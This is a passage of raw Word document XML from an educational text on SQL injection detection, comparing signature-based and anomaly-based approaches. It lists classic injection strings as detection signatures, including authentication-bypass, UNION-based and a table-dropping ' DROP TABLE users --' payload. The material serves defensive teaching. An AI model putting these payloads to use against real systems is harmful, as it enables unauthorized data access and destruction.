      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature-Based SQL Injection Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Signature-based detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> involves searching for known patterns or attack signatures in incoming traffic or requests. This method relies on pre-defined rules or signatures that describe typical SQL injection techniques, such as malicious SQL keywords (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, etc.) or attack payloads commonly used in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Signature Database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The detection system stores a set of known SQL injection patterns or attack payloads, such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>' OR '' = '</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Pattern Matching</w:t>
      </w:r>
      <w:r>
        <w:t>: Each incoming request is checked against the signature database. If the request matches a known attack pattern, the system flags it as a potential SQL injection attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Common SQL Injection Signatures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>' OR 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>' UNION SELECT NULL, NULL, NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>' AND 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>' OR 'a' = 'a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>' DROP TABLE users --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>If a WAF or IDS/IPS (Intrusion Detection/Prevention System) detects the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>' UNION SELECT NULL, NULL, NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>It would match this signature in the system’s predefined database and trigger an alert.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Quick and Efficient</w:t>
      </w:r>
      <w:r>
        <w:t>: Signature-based systems can quickly identify known attack patterns and block malicious traffic in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Low False Positives</w:t>
      </w:r>
      <w:r>
        <w:t>: Since the system relies on known attack patterns, it can minimize false positives (i.e., legitimate traffic flagged as an attack).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Easy to Implement</w:t>
      </w:r>
      <w:r>
        <w:t>: Signature-based detection is straightforward to implement, especially with existing signature databases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Inability to Detect New or Unknown Attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Signature-based detection is only effective against attacks that match known patterns. It is ineffective against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>zero-day attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or novel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> techniques that do not match any predefined signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Bypass via Obfuscation</w:t>
      </w:r>
      <w:r>
        <w:t>: Attackers can modify or obfuscate payloads (e.g., using encoding or case variations), which may evade signature detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Web Application Firewalls (WAFs)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Many WAFs (such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, AWS WAF, and others) use signature-based detection to block SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Intrusion Detection Systems (IDS)</w:t>
      </w:r>
      <w:r>
        <w:t>: Some IDS solutions use signature-based detection to flag known attack patterns in network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00D543D8" w:rsidP="00CE7341">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anomaly-Based SQL Injection Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Anomaly-based detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identifies deviations from the normal behavior of the application or system. In the context of SQL injection, anomaly-based systems look for patterns in database queries, HTTP requests, or application behavior that do not match the typical "good" behavior. This approach is particularly useful for detecting previously unknown or novel SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Baseline Behavior</w:t>
      </w:r>
      <w:r>
        <w:t>: The system first establishes a baseline of normal behavior by monitoring the application, user inputs, and SQL queries over time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Deviation Detection</w:t>
      </w:r>
      <w:r>
        <w:t>: It then compares incoming requests or database queries to this baseline. If a request deviates significantly from the normal behavior (e.g., contains suspicious input), it is flagged as an anomaly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Examples of deviations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Suspicious Input Patterns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Inputs containing characters like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, which are not part of normal inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Abnormal Query Structure</w:t>
      </w:r>
      <w:r>
        <w:t>: Requests that produce unusually complex or abnormal SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Response Time Variations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Time delays or changes in the response that could indicate SQL injection (e.g., time-based blind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An anomaly-based detection system might observe that normal queries to the database typically involve straightforward </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statements with a few conditions, while an incoming query contains an unusual number of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> conditions and union operations, which may be indicative of a SQL injection attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Detects Unknown Attacks</w:t>
      </w:r>
      <w:r>
        <w:t>: Unlike signature-based detection, anomaly-based detection can identify new or modified attack techniques that have not been seen before.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Detects Zero-Day Attacks</w:t>
      </w:r>
      <w:r>
        <w:t>: It can potentially catch novel SQL injection payloads, even if they do not match known attack signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Adaptive</w:t>
      </w:r>
      <w:r>
        <w:t>: Some systems can learn and adjust their detection patterns over time, improving their detection capabilities as they gather more data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Higher False Positives</w:t>
      </w:r>
      <w:r>
        <w:t>: Since anomaly-based detection relies on behavioral patterns, it is more prone to false positives (i.e., legitimate traffic being flagged as an attack).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Requires Training Data</w:t>
      </w:r>
      <w:r>
        <w:t>: The system needs a period of baseline monitoring to understand what constitutes "normal" behavior. Without this, the system may not perform optimally.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>More Complex</w:t>
      </w:r>
      <w:r>
        <w:t>: Implementing anomaly-based detection is generally more complex than signature-based detection and may require sophisticated machine learning or statistical techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Intrusion Detection Systems (IDS)</w:t>
      </w:r>
      <w:r>
        <w:t>: IDS tools that monitor network traffic for deviations in normal query patterns or other abnormal activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Web Application Monitoring</w:t>
      </w:r>
      <w:r>
        <w:t>: Used in combination with behavioral analysis tools to monitor HTTP requests and database queries for unusual patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Machine Learning-Based Detection</w:t>
      </w:r>
      <w:r>
        <w:t>: Some modern security systems leverage machine learning algorithms to detect SQL injection attacks by analyzing patterns in data and traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00D543D8" w:rsidP="00CE7341">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
